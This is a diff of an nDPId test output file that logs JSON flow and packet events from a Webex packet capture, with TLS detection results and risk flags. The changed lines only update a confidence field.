+01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} 
+00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"} 
@@ -202,50 +202,50 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"} 
-00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
